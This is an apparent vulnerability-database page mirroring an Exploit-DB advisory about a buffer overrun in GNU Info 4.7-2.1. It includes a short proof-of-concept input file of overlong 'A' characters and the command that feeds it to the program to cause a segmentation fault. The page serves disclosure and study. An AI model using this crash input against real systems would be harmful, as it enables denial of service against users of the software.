header-logo
Suggest Exploit
vendor:
Info
by:
Unknown
7.5
CVSS
HIGH
Buffer Overrun
119
CWE
Product Name: Info
Affected Version From: Version 4.7-2.1
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:gnu:info
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Buffer Overrun Vulnerability in GNU Info

GNU Info is prone to a buffer overrun vulnerability due to a lack of boundary checks performed on argument data for the (f) follow xref Info command. An attacker can exploit this vulnerability by crafting a malicious Info script that triggers the issue.

Mitigation:

No known mitigation or remediation is available for this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10882/info

GNU Info is reported prone to a buffer overrun vulnerability. The vulnerability is reported to present itself due to a lack of boundary checks performed on argument data for the (f) follow xref Info command.

An attacker may exploit this vulnerability by crafting a malicious Info script that is sufficient to trigger the issue.

Although this vulnerability is reported to affect info version 4.7-2.1, other versions might also be affected.

The following can be saved to a file and called as:
info info --restore=info.bug to create a segmentation fault.

[START info.bug]
gExpert Info

fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[END info.bug]

Navigation

Suggest Exploit

Services By CQR